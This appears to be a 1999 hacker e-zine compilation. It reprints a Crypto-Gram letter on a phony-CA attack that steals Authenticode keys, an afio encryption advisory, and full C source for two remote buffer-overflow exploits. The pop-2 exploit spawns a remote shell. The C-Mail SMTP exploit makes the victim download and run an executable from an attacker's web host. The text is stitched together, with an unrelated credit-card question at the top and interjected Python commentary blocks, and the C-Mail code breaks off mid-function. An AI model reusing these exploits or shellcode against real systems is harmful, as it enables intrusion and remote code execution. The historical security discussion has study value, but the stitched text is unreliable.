I understand that I have legal obligations to report a card stolen when I no longer have physical possession of it. But, since it is impossible for me to control knowledge of the Number (and Expiration Date), can the "fine print" of the Credit Acceptance I signed hold me fiscally responsible for something I can't control? Even if I did sign such terms, would they hold up in court, when I argue that I did nothing wrong and acted in a prudent manner? From: Geoff Thorpe Subject: Hacking root CAs in Internet Explorer I note my mate Peter Gutmann's email about substituting root CAs into IE's "certificate store". I think I actually alerted him to this, and the problem remains in more recent versions. IE Version 4 also registers the ".der" file extension so that an ASN encoded self-signed X509 CA certificate saved as cert.der and double-clicked will automatically launch the "Accept new CA cert?" dialog of IE. By default, all the options are enabled (ticked), including authenticating client and server certs (https), authenticating email certs (S/MIME), and software signing (Authenticode). Even the default button is "OK," so hitting enter is enough. They have, however, added a new dialog box, so that selecting OK gives a quick "Are you sure" type warning, displays all the information about the cert (distinguished name components, expiry dates, etc.) and the default button in this case is "No" (you have to click Yes to accept it). This still does not address the fact that most users will not really grasp the gaping security hole this creates for them -- though at least Netscape Communicator goes some way towards letting them know you REALLY should check up on the cert's authenticity before giving it too much trust -- and they have a neat option to always provide warnings when using certs signed by the new CA cert in question. There's a very dangerous attack permitted by this lax attitude towards accepting CA certs. 
If you can get anyone with an Authenticode signing key (perhaps a developer has a signed cert from Verisign or whoever) to accept a phony CA cert, then all hell can break loose. You can then get native code in a signed .cab file (signed with a cert that is signed from the phony CA) onto the developer's machine (it's now trusted, so they will not be given warnings -- and depending on their settings, they may not even be *told anything*). That native code can use MS's CryptoAPI to retrieve the developer's Authenticode private key (in typical fashion, the API does not require a password to retrieve the key) and mail it out to the hacker. That hacker then has someone else's code-signing cert and key. Using it, they can put signed viruses around, and provide signed hacked versions of software (perhaps providing a "mirror" of popular software all of which is really just dressed-up and highly creative "fdisk" variations) -- and if law enforcement ever get involved, their only lead will be the unfortunate developer's Authenticode cert. Of course, if the hacker can plant phony CA certs around everywhere, he/she can always just create their own phony CA-signed Authenticode certs (perhaps named "Microsoft Corp.") and use those. But the point being illustrated here is that the hacker only needs to get the phony CA into *one* developer's machine (not everybody they want to hack); after that, he/she has someone else's digital identity with which to wreak havoc. But this brings me around to an issue I had been wanting to mention, and relates to a background project of mine. Microsoft has its own cert-trust settings, store, and API (if any at all); so does Netscape, so does any S/MIME-enabled mailer, so does any secure tunneling utility, etc. etc. 
Not only has this led to a complete decentralisation (it's pretty much "per-application") on a user's system as to his/her "trust" settings, it has also led to the inevitable incompatibilities of standards -- just ask anyone working for a CA about processing cert-requests for IE (and each version thereof), Navigator, and the popular web-servers. They're all various mutations and modifications of ASN, X509, PEM, and MIME that give massive headaches for anyone who wants to dream of cross-compatibility (as of now, I don't know anyone who has managed to make a single user-cert (with private key) work on Communicator and IE simultaneously). My idea had been loosely termed the "PKI kernel" -- a core library and interface that is presumed present and callable on all systems being compiled and deployed. Unlike the proliferation of various PKI toolkits using various standards (PKIX, etc.) and proprietary interfaces, I wanted to just put the minimum necessary core in to allow some centralisation -- and to ensure it was thin enough that it did not impose functional restrictions on applications using it. E.g., I was thinking that this should not be a "provider plug-in" architecture, as its very benefit would come from it being singular and ubiquitous on a system. It would not provide any cryptographic tools (ciphers, PKC encryption, etc.), and it would not provide any services (SSL tunneling, SSH, etc.) -- it would simply be a way to centralise root certs, user certs, pending cert-requests, and private keys, and maintain policies as to their use. At its most rudimentary, it could just be a free-for-all cert repository. At its more refined, it could be a strict framework where a root-user has stipulated that policies are inherited from another system and that only certain certs can be used for certain things. 
E.g., an app can ask the core for a list of "user certs" for use with "https" or check if a particular CA cert is trusted for a certain task, the policy could stipulate that any signed (user) certs imported into the core for use with S/MIME must be at least 1024 bits and signed by the "X" CA, etc. It just seems that each operating system has one concept of "print management", or "the TCP/IP stack", etc., and yet every single crypto-enabled program seems to have its own concept of trusted root certs, cert-policies, key-usages, and all the incompatibilities that come with them. They all use the same "protocols" (SSL/TLS, S/MIME, etc.), and they all use the same "algorithms" (RC4, RSA, etc.), because everyone sensibly agrees that it's best to just get one standard right than many different standards simultaneously, yet it's often overlooked that authenticity and identification depend very much on the careful and coordinated handling of certification, which every application seems to want to have its own individual poke at. ** *** ***** ******* *********** ************* CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety. CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography. 
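Geoff Thorpe's letter above describes an IE4 trust store in which a freshly imported CA is ticked for every use by default, and sketches a central store with per-purpose policy as the alternative. What follows is an added example, not code from Crypto-Gram, from Thorpe or from any real PKI toolkit: a toy trust store in Python that puts the two policies side by side for the attack he describes (a code-signing cert issued by a phony root). Signatures are stand-ins (an HMAC under a per-CA secret the store holds) rather than real X.509 signature checks, and every CA, subject and secret below is made up.

```python
# Added example: per-purpose trust-store policy, modelled on the "PKI kernel"
# idea versus the IE4 "all uses ticked" import default. Toy signatures only.
import hashlib
import hmac
from dataclasses import dataclass

# The uses the IE4 dialog ticks by default (https client/server, S/MIME, Authenticode).
PURPOSES = ("server_auth", "client_auth", "email", "code_signing")


@dataclass(frozen=True)
class Cert:
    subject: str
    issuer: str
    key_bits: int
    sig: bytes  # HMAC over the to-be-signed fields; stand-in for an RSA signature


def _tbs(subject: str, issuer: str, key_bits: int) -> bytes:
    """The fields the issuer's 'signature' covers."""
    return f"{subject}|{issuer}|{key_bits}".encode()


def issue(ca_name: str, ca_secret: bytes, subject: str, key_bits: int) -> Cert:
    """A CA issues a leaf certificate (toy: HMAC under the CA's secret)."""
    sig = hmac.new(ca_secret, _tbs(subject, ca_name, key_bits), hashlib.sha256).digest()
    return Cert(subject, ca_name, key_bits, sig)


class TrustStore:
    """One system-wide store of roots, each with the purposes it may vouch for."""

    def __init__(self):
        self._roots = {}  # name -> (secret, allowed purposes, minimum leaf key bits)

    def add_root(self, name: str, secret: bytes, purposes, min_key_bits: int = 0):
        unknown = set(purposes) - set(PURPOSES)
        if unknown:
            raise ValueError(f"unknown purposes: {sorted(unknown)}")
        self._roots[name] = (secret, frozenset(purposes), min_key_bits)

    def add_root_ie4_default(self, name: str, secret: bytes):
        """What double-clicking cert.der and pressing Enter gives you: every use enabled."""
        self.add_root(name, secret, PURPOSES)

    def check(self, cert: Cert, purpose: str):
        """Return (ok, reason): may `cert` be used for `purpose` under this store's policy?"""
        if purpose not in PURPOSES:
            return False, f"unknown purpose {purpose!r}"
        root = self._roots.get(cert.issuer)
        if root is None:
            return False, f"issuer {cert.issuer!r} not in trust store"
        secret, allowed, min_bits = root
        expected = hmac.new(secret, _tbs(cert.subject, cert.issuer, cert.key_bits),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, cert.sig):
            return False, "signature does not verify"
        if purpose not in allowed:
            return False, f"issuer not trusted for {purpose}"
        if cert.key_bits < min_bits:
            return False, f"key is {cert.key_bits} bits, policy minimum is {min_bits}"
        return True, "ok"


if __name__ == "__main__":
    phony_secret = b"phony-root-secret"          # made up
    cab_signer = issue("Phony Root", phony_secret, "Microsoft Corp.", 512)
    lax = TrustStore()
    lax.add_root_ie4_default("Phony Root", phony_secret)
    strict = TrustStore()
    strict.add_root("Phony Root", phony_secret, ("server_auth",), min_key_bits=1024)
    print("IE4 default :", lax.check(cab_signer, "code_signing"))
    print("per-purpose :", strict.check(cab_signer, "code_signing"))
```

Under the all-boxes-ticked import the 512-bit cert from the phony root is accepted for code signing; once the same root is limited to server authentication with a minimum leaf key size it is refused, which is the policy hook the letter asks for. A real implementation would verify the chain with the issuer's public key and take the purposes from the certificate's key-usage and extended-key-usage extensions; the policy layer around that looks the same.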
Counterpane Systems is a six-person consulting firm specializing in cryptography and computer security. Counterpane provides expert consulting in: design and analysis, implementation and testing, threat modeling, product research and forecasting, classes and training, intellectual property, and export consulting. Contracts range from short-term design evaluations and expert opinions to multi-year development efforts. http://www.counterpane.com/

Copyright (c) 1999 by Bruce Schneier

@HWA

107.0 pop.c a pop-2 remote exploit by smiler
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * A pop-2 remote exploit that gives a nobody shell.
 * gcc pop.c -o pop -O3 -Wall
 * Autodetects what version you're sploiting and adjusts ret position and
 * offset accordingly.
 * Tested on redhat 5.2, 5.1, 5.0 and 4.2. Probably only really useful
 * using it on 5.2 tho, cos the rest will most likely have imap open too.
 * NB: To exploit pop-2 you have to take into account the length of both
 * the hostname and username (unlike all the pop2 exploits out there).
 * - smiler
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Linux/x86 execve("/bin/sh") shellcode. The string is stored with 0x20
 * subtracted from each byte and added back at run time, so "/bin/sh"
 * never appears literally in the packet. */
unsigned char hellcode[]=
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01"
"\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89"
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0"
"\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f"
"\x53\x48";

/* Banner substring -> per-version adjustment of the return address
 * (offset) and of where the saved EIP sits (alignment). */
struct type {
    char *text;
    int offset;
    int alignment;
};

struct type types[]={
    {"4.46",0,0},
    {"3.35",0,19},
    {"3.44",0,19},
    {"2.3(30)",0,19},
    {NULL,0,0}};

int pop2_type = 0;
#define RET 0xbffff5b1

void usage(char *prog);
int resolv(char *hname, struct in_addr *addr);
int send_oberflow(int fd, char *host, char *user, int offset);
void run_shell(int fd);
int set_pop_type(char *buf, int n);
int do_connect(struct sockaddr_in *serv);

char temp_pass[20], *password;

int main(int argc, char **argv)
{
    int fd,n;
    char buf[2048];
    struct sockaddr_in servaddr;

    if (argc < 5) usage(argv[0]);
    password = strdup(argv[3]);
    bzero(argv[3],strlen(argv[3])); /* Mask the password from the cmdline =) */
    bzero(&servaddr,sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(109);
    if (!resolv(argv[4],&servaddr.sin_addr)) {
        herror("resolv");
        exit(-1);
    }
    fd = do_connect(&servaddr);
    if ((n = recv(fd, buf, 1024, 0)) <= 0) {
        perror("recv");
        return -1;
    }
    /* Get the banner */
    write(STDOUT_FILENO, buf, n);
    set_pop_type(buf,n);
    printf("Pop type = %d\n",pop2_type);
    /* HELO localhost:dave password */
    snprintf(buf, sizeof(buf), "HELO %s:%s %s\r\n",argv[1],argv[2],password);
    send(fd, buf, strlen(buf), 0);
    printf("Sleeping\n");
    sleep(3);
    n = recv(fd, buf, sizeof(buf), 0);
    /* argv[4] is the target; the optional offset is argv[5]. */
    send_oberflow(fd, argv[1], argv[2], argc > 5 ? atoi(argv[5]) : 0);
    run_shell(fd);
    return 0;
}

/* Relay stdin to the socket and the socket to stdout until either closes. */
void run_shell(int fd)
{
    int n;
    char recvbuf[1024];
    fd_set rset;

    while(1) {
        FD_ZERO(&rset);
        FD_SET(fd, &rset);
        FD_SET(STDIN_FILENO, &rset);
        select(fd+1,&rset,NULL,NULL,NULL);
        if (FD_ISSET(fd, &rset)) {
            n = recv(fd, recvbuf, 1024,0);
            if (n <= 0){
                fprintf(stderr,"Connection closed\n");
                return;
            }
            write(STDOUT_FILENO, recvbuf, n);
        }
        if (FD_ISSET(STDIN_FILENO, &rset)) {
            n = read(STDIN_FILENO, recvbuf, 1024);
            if (n <= 0) return;
            send(fd, recvbuf, n, 0);
        }
    }
    return;
}

/* Build "FOLD " + NOP sled + shellcode + return address. The saved EIP
 * sits at byte 1016 minus the HELO host and user lengths (the server
 * copies both into the same frame), minus the per-version alignment. */
int send_oberflow(int fd, char *host, char *user, int offset)
{
    unsigned char buf[1050];
    unsigned int target;
    int ret,ctr,a = 0;

    ret = 1016 - strlen(host) - strlen(user);
    ret -= types[pop2_type].alignment;
    if (ret < (int)strlen((char *)hellcode) + 5 || ret + 6 > (int)sizeof(buf)) {
        fprintf(stderr,"host/user too long for this layout (ret=%d)\n",ret);
        return 0;
    }
    memset(buf,0x90,sizeof(buf));
    memcpy(buf,"FOLD ",5);
    for (ctr = ret - strlen((char *)hellcode);ctr < ret; ctr++)
        buf[ctr] = hellcode[a++];
    target = RET + offset + types[pop2_type].offset;
    memcpy(buf + ret, &target, 4);   /* little-endian 32-bit return address */
    strcpy((char *)(buf + ret + 4),"\r\n");
    send(fd, buf, strlen((char *)buf), 0);
    return 1;
}

int do_connect(struct sockaddr_in *serv)
{
    int fd;

    fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (fd < 0) {
        perror("socket");
        exit(-1);
    }
    if (connect(fd, (struct sockaddr *)serv, sizeof(*serv)) < 0) {
        perror("connect");
        exit(-1);
    }
    return fd;
}

/* Pick the types[] entry whose version string appears in the banner. */
int set_pop_type(char *buf, int n)
{
    int ctr = 0;

    buf[n] = 0;
    while(types[ctr].text) {
        if (strstr(buf,types[ctr].text)) {
            pop2_type = ctr;
            return 1;
        }
        ctr++;
    }
    pop2_type = 0;
    return pop2_type;
}

int resolv(char *hname, struct in_addr *addr)
{
    struct hostent *res;

    if (inet_aton(hname,addr)) return 1;
    res = gethostbyname(hname);
    if (res == NULL) return 0;
    memcpy((char *)addr,(char *)res->h_addr, sizeof(struct in_addr));
    return 1;
}

void usage(char *prog)
{
    /* Argument names reconstructed from how main() uses argv. */
    fprintf(stderr,"Usage: %s <helo-host> <user> <password> <target> [offset]\n",prog);
    exit(-1);
}

@HWA

108.0 afio: security hole in 'afio -P pgp' encrypted archives
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 11 Jun 1999 16:55:30 -0000
From: cezar@CS.NET.PL
To: BUGTRAQ@netspace.org
Subject: (fwd) SECURITY: afio: security hole in 'afio -P pgp' encrypted archives

Hello,

Just found it on comp.os.linux.announce. Sorry if it was already on the list.

cezar

-----BEGIN PGP SIGNED MESSAGE-----

I believe that there are very few people who use afio's -P option for encrypting afio archive contents with pgp.
If you do not use afio, pgp, or the 'afio -P pgp' option, it is safe to skip this message.

I. Description

Since version 2.4.2, the afio archiver has had an interface, the '-P pgp' command line option, which can be used to pgp-encrypt the file data written to an afio archive. Following up on some bug reports, I have recently discovered a security problem with this afio-pgp interface: pgp encryption is not always applied in the right way. This makes it possible to crack the encryption on the file data in an 'encrypted' archive produced using afio with the '-P pgp' option.

The security of files which were already encrypted _before_ being written to the archive is not affected.

The security hole is not in pgp itself, but in the interaction between afio and pgp. Other programs which interact with pgp to encrypt things are very unlikely to have a similar security hole.

II. Impact

It is possible to crack the encryption of at least some of the file data in the 'encrypted' archives produced using 'afio -P pgp'. This includes archives produced using the pgp_write example script included in the afio distribution.

The attack against the broken archive encryption is obscure, but not impossible to find. The next version of afio (due out in 1-n months) will fix the security bug. By reverse-engineering the bug fix, it will be easier to find the attack. So the release of the next afio version will make already-existing 'afio -P pgp' archives more vulnerable.

III. Solution

_Existing archives_ produced with 'afio -P pgp' should really be treated with the same care (against theft etc.) as unencrypted archives. If such existing archives cannot be deleted or safely locked away, then encrypting the _entire_ existing archive file with pgp will protect it. Such completely encrypted archives will _not_ be fault-tolerant against storage media errors, like normal afio archives are.

_New archives_ which really need to be protected with encryption can be made by having afio output the archive to stdout and piping this output through pgp:

    find [options] | afio -o [options] - | pgp [options] >device_or_file

Such encrypted archives will _not_ be fault-tolerant against storage media errors, like normal afio archives are.

The next version of afio (due out in 1-n months) will fix this security hole by which 'afio -P pgp' creates unsafe archives.

On a personal note: I don't use PGP myself, and am not an expert in dealing with security bugs. Obviously, reporting the existence of the bug makes existing archives more vulnerable. Before I get flamed for handling this in entirely the wrong way: yes, I did ask some experts first, and this procedure is what came out.

Koen. (current afio maintainer)

- --
This article has been digitally signed by the moderator, using PGP.
http://www.iki.fi/mjr/cola-public-key.asc has PGP key for validating signature.
Send submissions for comp.os.linux.announce to: linux-announce@news.ornl.gov
PLEASE remember a short description of the software and the LOCATION.
This group is archived at http://www.iki.fi/mjr/linux/cola.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1

iQCVAgUBN2A06FrUI/eHXJZ5AQFliAQAiY+ViFPj6ADX323dVh2P/H1BBD7lBs/8
pR+JYYNReWqmr75Nvx33KtxGjlZmr/DG5cLp6Wb91RD4Xj2qZQkpoEUq5BjjkGFh
6kUKBD49Z6G3XDEzlGUH1UBchvnB8zBTTHMG4T1KzL0xkXBDIn1GjrLNZSOiMyAs
g1koMsqZANk=
=yXea
-----END PGP SIGNATURE-----

-- end of forwarded message --

--
cezar
CYBER Service / PKFL

@HWA

109.0 C-Mail SMTP Server Remote Buffer Overflow Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 16 Jun 1999 16:42:43 -0400
From: pw
To: BUGTRAQ@netspace.org
Subject: C-Mail SMTP Server Remote Buffer Overflow Exploit

This is an exploit for a buffer overflow in the C-Mail SMTP Server which recently had an advisory posted for it by the Eeye Digital Security Team.
I would like to thank them for telling me about the vulnerability before it was released.

Everything is standard in the exploit except that the shellcode is placed before the return address on the buffer, because there isn't enough room after it. To execute the shellcode we put a small stub of code after our return address and have the return address point to a jmp esp. The small stub of code when executed points ecx to our shellcode and jumps to it. We can do this because ecx will always point to the start of our shellcode's original buffer before it's copied at overflow time (at least in this version).

This has been tested with only one version of C-Mail, unfortunately I don't have the version number written down and my evaluation period is up :). I can say that it is the version which was being distributed from their web site about 2 months ago.

There are return addresses in the following exploit which should work under win95, 98 and NT. To compile it under win32 just remove the "#define UNIX".
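The post notes that the http host is "encrypted" before being pasted into the egg; the exploit does it by adding one to every byte, and the same trick is applied to the table of DLL and API names the shellcode resolves at run time, so that no 0x00, 0x0A or 0x0D ends up inside what is, on the wire, a single "VRFY ...\r\n" command line. As an added example, not part of _mcp_'s post, the Python below undoes that encoding on byte strings copied from the exploit's code[] and dir[] arrays and scans a payload for SMTP-hostile bytes. It reproduces only the effect of the shellcode's subtract-one decoder loop, not its instructions; the sample host is made up.

```python
# Added example: decode the +1-encoded string table carried by the C-Mail
# shellcode and check a payload for bytes that would cut an SMTP line short.
# ENCODED_TABLE and ENCODED_DIR are copied from the exploit's code[] and dir[].

# Tail of code[] after its final call: the KERNEL32 group, a group terminator,
# the WININET group, a group terminator, then "http://" (every byte +1).
ENCODED_TABLE = (
    b"\x4C\x46\x53\x4F\x46\x4D\x34\x33\x01"
    b"\x60\x6D\x64\x73\x66\x62\x75\x01"
    b"\x60\x6D\x78\x73\x6A\x75\x66\x01"
    b"\x60\x6D\x64\x6D\x70\x74\x66\x01"
    b"\x48\x6D\x70\x63\x62\x6D\x42\x6D\x6D\x70\x64\x01"
    b"\x58\x6A\x6F\x46\x79\x66\x64\x01"
    b"\x46\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x01"
    b"\x02"
    b"\x58\x4A\x4F\x4A\x4F\x46\x55\x01"
    b"\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66\x6F\x42\x01"
    b"\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66\x6F\x56\x73\x6D\x42\x01"
    b"\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53\x66\x62\x65\x47\x6A\x6D\x66\x01"
    b"\x02"
    b"\x69\x75\x75\x71\x3B\x30\x30"
)
# dir[]: the path pasted in after the http host, also +1 encoded.
ENCODED_DIR = b"\x30\x7F\x71\x78\x30\x70\x78\x6F\x66\x65\x2F\x66\x79\x66\x01"

# Bytes that terminate or split a command line for a server reading "VRFY ...\r\n".
SMTP_BAD_BYTES = frozenset({0x00, 0x0A, 0x0D})


def encode_plus_one(data: bytes) -> bytes:
    """What the exploit does to argv[2] (the http host) before pasting it in."""
    return bytes((b + 1) & 0xFF for b in data)


def decode_plus_one(data: bytes) -> bytes:
    """Effect of the shellcode's decoder loop: subtract one from every byte."""
    return bytes((b - 1) & 0xFF for b in data)


def parse_name_table(decoded: bytes):
    """Split a decoded table into [[module, api, ...], ...] plus the unterminated tail.

    After decoding, 0x00 ends a name and a lone 0x01 ends a module's group, the
    same two values the shellcode's resolver loop compares against.
    """
    groups, current, name = [], [], bytearray()
    for b in decoded:
        if b == 0x00:
            current.append(name.decode("ascii"))
            name = bytearray()
        elif b == 0x01 and not name:
            groups.append(current)
            current = []
        else:
            name.append(b)
    return groups, name.decode("ascii")


def first_bad_byte(payload: bytes, bad=SMTP_BAD_BYTES) -> int:
    """Index of the first byte the SMTP line would choke on, or -1 if the payload is clean."""
    for i, b in enumerate(payload):
        if b in bad:
            return i
    return -1


def decoder_count(url_host: bytes, base: int = 0x82) -> int:
    """Loop count the exploit patches into 'mov cl, 0x82' so the in-place decoder
    also covers the appended host and dir[] bytes ((*ptr2) += len + sizeof(dir))."""
    return (base + len(url_host) + len(ENCODED_DIR) + 1) & 0xFF


if __name__ == "__main__":
    groups, tail = parse_name_table(decode_plus_one(ENCODED_TABLE))
    for group in groups:
        print(group[0], "->", ", ".join(group[1:]))
    print("url prefix:", tail + decode_plus_one(ENCODED_DIR).decode("ascii"))
    egg_tail = ENCODED_TABLE + encode_plus_one(b"10.0.0.1") + ENCODED_DIR  # host made up
    print("first bad byte in encoded tail:", first_bad_byte(egg_tail))
```

Decoding recovers the KERNEL32 and WININET import lists and the "http://" prefix that the host and "/~pw/owned.exe" are appended to, which is what a responder pulling this off the wire or out of a crash dump wants first. The encoded form contains none of the bad bytes while its decoded form has a NUL eight bytes in, which is the whole reason for the +1 scheme; and because the host is appended at build time, the count in the decoder loop has to be patched to cover it, as decoder_count() shows.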
-mcp

<---------------------------CUT HERE------------------------>

#define UNIX

#ifndef UNIX
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#define CLOSE _close
#define SLEEP Sleep
#else
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define CLOSE close
#define SLEEP sleep
#endif

/* CMail Exploit by _mcp_
   Sp3 return address and win32 porting by acpizer */

const unsigned long OFFSET = 635;      /* saved return address sits here, after "VRFY " */
const unsigned long LENGTH = 650;      /* total length of the egg */
const unsigned long CODEOFFSET = 11;   /* shellcode starts this far into the buffer */

/* Shellcode: resolves KERNEL32/WININET imports from a +1-encoded name table
   it decodes in place, fetches http://<host>/~pw/owned.exe and runs it. */
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x01"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x5B\xC1\xE3\x10\x66\xBB"
"\x18\x79\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x06\x75\xF9\x46"
"\x83\xC0\x01\x3A\x06\x74\xDD\x56\x55\x33\xDB\xB3\x5B\xC1\xE3"
"\x10\x66\xBB\x44\x79\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x02\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x51\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x07\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x01"
"\x60\x6D\x64\x73\x66\x62\x75\x01\x60\x6D\x78\x73\x6A\x75\x66"
"\x01\x60\x6D\x64\x6D\x70\x74\x66\x01\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x01\x58\x6A\x6F\x46\x79\x66\x64\x01\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x01\x02\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x01\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x01\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x01\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x01\x02\x69\x75\x75\x71\x3B\x30"
"\x30\x00";

/* This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x01";

/* Below is:
       add ecx, 10
       jmp ecx
   We use this to transfer to our code that we store before the return
   address on our overflow buffer. We have to do this because there isn't
   near enough room behind the return address to include the code. If we
   weren't lucky enough to have a register pointing virtually right to our
   code we could include a routine that searches memory for a specific
   dword in a specific direction relative to a register's value, then
   transfers control to our code located there. The code can also be
   easily snuck in on another buffer by doing this. */
char controlcode[] = "\x83\xc1\x0A\xFF\xE1";

unsigned int getip(char *hostname)
{
    struct hostent *hostinfo;
    unsigned int binip;

    hostinfo = gethostbyname(hostname);
    if(!hostinfo) {
        printf("cant find: %s\n",hostname);
        exit(0);
    }
    memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
    return(binip);
}

int usages(char *fname)
{
    printf("Remote Buffer Overflow exploit v1.2 by _mcp_ .\n");
    printf("Win32 Porting and nt sp3 address By Acpizer \n");
    printf("Usages: \n");
    /* Argument names reconstructed from how main() uses argv. */
    printf("%s <target> <http host> <return address>\n", fname);
    printf("win98:\n");
    printf(" <return address> = 0xBFF79243\n");
    printf("NT SP3:\n");
    printf(" <return address> = 0x77E53FC7\n");
    printf("NT SP4:\n");
    printf(" <return address> = 0x77E9A3A4\n");
    printf("Will make running CSMMail download, save, and\n");
    printf("execute http://<http host>/~pw/owned.exe\n");
    exit(0);
}

int main (int argc, char *argv[])
{
    int sock,sinlen;
    unsigned int targethost;
    struct sockaddr_in sin;
    static unsigned char buffer[20000];
    unsigned char *ptr,*ptr2;
    unsigned int ret_addr;         /* 4 bytes; exactly what is copied into the egg */
    int len,x = 1;
#ifndef UNIX
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;

    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if (err != 0) exit(1);
#endif

    if (argc < 4) usages(argv[0]);
    targethost = getip(argv[1]);
    len = strlen(argv[2]);
    if (len > 60) {
        printf("Bad http format!\n");
        usages(argv[0]);
    }

    ptr = (unsigned char *)argv[2];
    while (x <= len) {
        x++;
        (*ptr)++;      /* Encrypt the http ip for later parsing */
        ptr++;
    }

    if( (sscanf(argv[3],"0x%x", &ret_addr)) == 0) {
        printf("Input error, the return address has incorrect format\n");
        exit(0);
    }

    sock = socket(AF_INET,SOCK_STREAM,0);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = targethost;
    sin.sin_port = htons(25);
    sinlen = sizeof(sin);

    printf("Starting to create the egg\n");
    ptr = buffer;
    strcpy((char *)ptr,"VRFY ");
    ptr+=5;
    memset((void *)ptr, 0x90, 7000);
    ptr2=ptr;
    ptr2+=OFFSET;
    memcpy ((void *) ptr2,(void *)&ret_addr, 4);
    ptr2+=8;
    /* Put the code on the stack that transfers control to our code */
    memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) );
    ptr2=ptr;
    ptr2+=LENGTH;
    (*ptr2)=0x00;
    ptr+=CODEOFFSET;
    memcpy((void *) ptr,(void *)&code,strlen(code));

    /* Patch the decoder loop count (the byte after the 0xB1 "mov cl" opcode)
       so it also covers the http host and dir[] appended after the table. */
    ptr2 = (unsigned char *)strstr((char *)ptr,"\xb1");
    if (ptr2 == NULL) {
        printf("Bad shell code\n");
        exit(0);
    }
    ptr2++;
    (*ptr2)+= len + ( sizeof(dir) );

    /* Patch the immediate of the "add esi, N" (83 C6 NN) for the host length. */
    ptr2 = (unsigned char *)strstr((char *)ptr,"\x83\xc6");
    if (ptr2 == NULL) {
        printf("Bad shell code\n");
        exit(0);
    }
    ptr2+= 2;
    (*ptr2)+= len + 8;

    ptr+=strlen(code);
    memcpy((void *) ptr, (void *) argv[2], len);   /* Parse in the http site's info */
    ptr+=len;
    memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) );
    printf("Made the egg\n");

    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) {
        perror("error:");
        exit(0);
    }
    printf("Connected.\n");

#ifndef UNIX
    send(sock, (char *)buffer, strlen((char *)buffer), 0);
    send(sock,"\r\n",2,0);
#else
    write(sock, buffer, strlen((char *)buffer) );
    write(sock,"\r\n",2);
#endif
    SLEEP(1);
    printf("Sent the egg\n");
#ifndef UNIX
    WSACleanup();
#endif
    CLOSE(sock);
